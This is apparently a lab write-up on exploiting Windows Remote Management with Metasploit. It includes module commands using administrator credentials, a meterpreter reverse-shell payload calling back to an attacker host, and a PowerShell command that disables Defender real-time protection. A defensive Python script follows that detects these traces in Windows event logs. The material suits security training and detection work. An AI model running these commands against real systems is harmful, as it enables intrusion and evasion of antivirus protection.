• In a Windows-based environment, IT professionals often require the ability to remotely manage and execute commands on other Windows-based devices. For this purpose, they rely on a common protocol or application like Web Services Management (WS-Management). WS-Management allows for the exchange of management information across different operating systems and services on a network. Notably, Microsoft has developed its own implementation of the WS-Management protocol, known as Windows Remote Management (WinRM), tailored specifically for Microsoft Windows operating systems.

Exploitation:

  1. Open Kali for scanning and exploitation.
  2. Open msfconsole for the exploitation part:
sudo msfconsole
use auxiliary/scanner/winrm/winrm_cmd
msf auxiliary(scanner/winrm/winrm_cmd) > set RHOSTS 192.168.83.140
RHOSTS => 192.168.83.140
msf auxiliary(scanner/winrm/winrm_cmd) > set USERNAME Administrator
USERNAME => Administrator
msf auxiliary(scanner/winrm/winrm_cmd) > set PASSWORD P@ssword1
PASSWORD => P@ssword1
  3. By default, the command the module executes is ipconfig /all.
  4. Remember the local user setup for WinRM access, where we granted access to the user sysadmin; let’s try that:
  • It actually worked.

  1. Now let’s try for a remote shell:
msf6 > use exploit/windows/winrm/winrm_script_exec
msf6 exploit(windows/winrm/winrm_script_exec) > set RHOSTS 192.168.83.140
msf6 exploit(windows/winrm/winrm_script_exec) > set LHOST 192.168.83.128
  2. Also turn off real-time protection on your Windows server, because it will quarantine the execution.
  • Use this command in PowerShell on your DC:
Set-MpPreference -DisableRealtimeMonitoring $true

  3. After selecting the exploit/windows/winrm/winrm_script_exec module, a reverse shell payload was automatically coupled with the exploit module within Metasploit.
  4. To give the exploit/windows/winrm/winrm_script_exec module a better chance of success, force it to use the VBS CmdStager (FORCE_VBS) if your target is an old system; otherwise set it to false. Let’s see the options:

msf exploit(windows/winrm/winrm_script_exec) > set DOMAIN REDTEAMLAB
DOMAIN => REDTEAMLAB
msf exploit(windows/winrm/winrm_script_exec) > set USERNAME Administrator
USERNAME => Administrator
msf exploit(windows/winrm/winrm_script_exec) > set PASSWORD Password123
PASSWORD => Password123
msf exploit(windows/winrm/winrm_script_exec) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(windows/winrm/winrm_script_exec) > set FORCE_VBS false
FORCE_VBS => false


  • Run the exploit.
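As an added example that is not part of this lab write-up, the following Python sketch shows what a defender would look for on the target side of the procedure above: commands run through a WinRM shell are spawned by wsmprovhost.exe (visible as the parent in Security event 4688), and the Set-MpPreference step produces Windows Defender operational event 5001 (real-time protection disabled). The event records, field names and timestamps are constructed and simplified for the example, not a real log format.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Process that hosts commands executed through a WinRM remote shell.
WINRM_HOST_PROCESS = "wsmprovhost.exe"
# Both traces on one host within this window is treated as high severity.
CORRELATION_WINDOW = timedelta(minutes=10)


def classify(event):
    """Return (host, kind, detail) for an event of interest, else None."""
    if event["id"] == 4688 and event.get("parent", "").lower().endswith(WINRM_HOST_PROCESS):
        return (event["host"], "winrm_exec",
                f"{event['user']} ran '{event['cmdline']}' via WinRM")
    if event["id"] == 5001:
        return (event["host"], "rtp_disabled", "Defender real-time protection disabled")
    return None


def scan(events):
    """Emit one medium alert per hit, plus a high alert when a host shows
    WinRM-launched execution and Defender being disabled close together."""
    hits = defaultdict(list)
    alerts = []
    for e in events:
        c = classify(e)
        if c is None:
            continue
        host, kind, detail = c
        hits[host].append((datetime.fromisoformat(e["time"]), kind))
        alerts.append(f"[medium] {host}: {detail}")
    for host, h in hits.items():
        execs = [t for t, k in h if k == "winrm_exec"]
        rtps = [t for t, k in h if k == "rtp_disabled"]
        if any(abs(r - x) <= CORRELATION_WINDOW for r in rtps for x in execs):
            alerts.append(f"[high] {host}: WinRM remote execution and Defender "
                          f"real-time protection disabled within {CORRELATION_WINDOW}")
    return alerts


# Constructed sample events (simplified 4688 / 5001 records, not real log output).
SAMPLE_EVENTS = [
    {"id": 4688, "time": "2024-05-01T10:00:00", "host": "DC01", "user": "REDTEAMLAB\\sysadmin",
     "parent": r"C:\Windows\System32\wsmprovhost.exe", "cmdline": "ipconfig /all"},
    {"id": 4688, "time": "2024-05-01T10:01:00", "host": "DC01", "user": "REDTEAMLAB\\alice",
     "parent": r"C:\Windows\explorer.exe", "cmdline": "notepad.exe"},  # benign, ignored
    {"id": 5001, "time": "2024-05-01T10:04:00", "host": "DC01", "user": "REDTEAMLAB\\sysadmin"},
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert)
```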